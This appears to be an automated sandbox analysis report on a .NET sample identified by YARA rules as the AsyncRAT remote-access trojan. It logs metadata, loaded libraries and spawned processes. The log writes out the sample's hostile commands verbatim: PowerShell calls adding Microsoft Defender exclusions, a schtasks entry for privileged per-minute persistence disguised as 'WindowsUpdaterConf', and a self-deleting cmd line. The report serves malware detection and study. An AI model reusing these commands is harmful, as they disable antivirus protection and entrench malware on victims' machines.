                            Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                            Source: file.exe, 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
                            Source: file.exe, 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
                            Source: file.exe, 00000000.00000002.1753213995.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                            Source: file.exe, 00000000.00000002.1754386213.0000000003241000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                            Source: file.exe, 00000001.00000002.4215160778.0000000006429000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                            Source: file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                            Source: file.exe, 0000000E.00000002.2241827212.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                            Source: file.exe, 0000000E.00000002.2228777015.00000000017BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                            Source: file.exe, 00000016.00000002.2202609553.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename[ vs file.exe
                            Source: file.exe, 00000016.00000002.2211795636.0000000002701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
                            Source: file.exe.0.drBinary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: file.exe, -----------.csCryptographic APIs: 'CreateDecryptor'
                            Source: file.exe, -----------.csCryptographic APIs: 'CreateDecryptor'
                            Source: file.exe, -----------.csCryptographic APIs: 'CreateDecryptor'
                            Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.csCryptographic APIs: 'CreateDecryptor'
                            Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.csCryptographic APIs: 'CreateDecryptor'
                            Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.csCryptographic APIs: 'CreateDecryptor'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, ub7IeQ5sqWntl1qadx7oq8YPwaBWDRNX9iR60l23xp96M8SJ85dQZQ0Jlyoi3nwkDA9WIIBOt0Hb0HYwHI.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.csBase64 encoded string: 'qAq30AxffhrvXLBhF/J54DxsrJez/5pcJX28TuK2xIchlZzEPe82Pg48Pkom/jcV'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.csBase64 encoded string: 'qAq30AxffhrvXLBhF/J54DxsrJez/5pcJX28TuK2xIchlZzEPe82Pg48Pkom/jcV'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@39/52@2/3
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\file.exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6184
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4040
                            Source: C:\Users\user\WindowsUpdaterConf.exeMutant created: NULL
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5780
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6024
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3020
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:332:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\4jKORaOV68phsKu6
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5960
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5688
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: file.exeReversingLabs: Detection: 47%
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c timeout /t 1 && DEL /f file.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\file.exe "C:\Users\user\AppData\Roaming\file.exe"
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\file.exe "C:\Users\user\AppData\Roaming\file.exe"
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1140
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 1204
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Users\user\WindowsUpdaterConf.exe "C:\Users\user\WindowsUpdaterConf.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6184 -ip 6184
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 1144
                            Source: unknownProcess created: C:\Users\user\WindowsUpdaterConf.exe "C:\Users\user\WindowsUpdaterConf.exe"
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1164
                            Source: unknownProcess created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1148
                            Source: unknownProcess created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 1132
                            Source: unknownProcess created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c timeout /t 1 && DEL /f file.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
